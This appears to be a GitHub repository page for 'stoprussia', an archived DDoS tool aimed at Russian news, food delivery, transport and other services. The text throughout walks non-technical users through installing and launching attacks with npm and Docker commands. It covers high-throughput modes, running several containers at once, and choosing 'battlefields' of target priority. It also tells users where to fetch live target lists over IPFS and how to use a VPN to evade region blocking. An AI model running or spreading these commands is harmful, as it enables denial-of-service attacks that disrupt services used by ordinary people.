0x77dev / stoprussia

Russia MUST BE STOPPED! This repository contains a set of tools to attack russian services such as news, food delivery, transport and more for both technical and non-technical kind of persons

Home Page:https://stoprussia.0x77.dev

Geek Repo:Geek Repo

Github PK Tool:Github PK Tool

Archived due to small activity and better alternatives

StopRussia

banner

Support the Ukraine 🇺🇦

Russia MUST BE STOPPED! This repository contains a set of tools to attack russian services such as news, food delivery, transport and more for both technical and non-technical kind of persons

List is updated once a hour according to: IT Army of Ukraine and ddos котики Ukrainian communities

How to get started?

First of all, do not do this at full power from Ukrainian providers, this can harm the connectivity of other people with the world by taking down providers if a lot of people will do this simultaneously.

Also you need to use a VPN if you running this on your local machine, because many of the services uses region blocking to not accept requests from Ukraine

ClearVPN is a good choice, use can use promo-code SAVEUKRAINE to get free access for a year

Web browser

You can use web tool to start DDoS on russian services: https://stoprussia.0x77.dev

CLI

Install Node.js >=16

npm i -g stoprussia autocannon
stoprussia

Running in war mode

stoprussia -p -t 2 -b 4

or

stoprussia -p -t 2 -b 3

Choosing battlefield

stoprussia -b 4

Running in power mode

Do not use it Ukraine! This mode requires a lot of network throughput This mode multiplies threads by 2

stoprussia -p -t 2

Docker

Install Docker

Single instance:

docker run -it ghcr.io/0x77dev/stoprussia:main

Running multiple instances:

docker run -t ghcr.io/0x77dev/stoprussia:main -b 1 &
docker run -t ghcr.io/0x77dev/stoprussia:main -b 2 &
docker run -t ghcr.io/0x77dev/stoprussia:main -b 3 &
docker run -t ghcr.io/0x77dev/stoprussia:main -b 4

More coming soon

More performant desktop, docker and kubernetes versions coming soon...

Choosing battlefield

The list of targets are split into 4 chunks each chunk called battlefield

Battlefield 1: passive attack and low priority services

Battlefield 2: passive attack and medium priority services

Battlefield 3: active attack and medium priority services

Battlefield 4: active attack and high priority services

Battlefield 3 and 4 is the main focus to DDoS

How can I get the list of targets?

Targets list are distributed over IPFS

You get it by resolving IPNS name

ipns://srl.0x77.dev

by requesting Cloudflare Gateway:

https://srl.0x77.dev

or by requesting Cloudflare Gateway directly:

https://cloudflare-ipfs.com/ipns/srl.0x77.dev

or by requesting public IPFS gateway:

https://ipfs.io/ipns/srl.0x77.dev

About

Russia MUST BE STOPPED! This repository contains a set of tools to attack russian services such as news, food delivery, transport and more for both technical and non-technical kind of persons

https://stoprussia.0x77.dev

License:GNU General Public License v3.0


Languages

Language:TypeScript 62.3%Language:HTML 31.2%Language:JavaScript 4.2%Language:Dockerfile 1.4%Language:CSS 0.5%Language:Batchfile 0.3%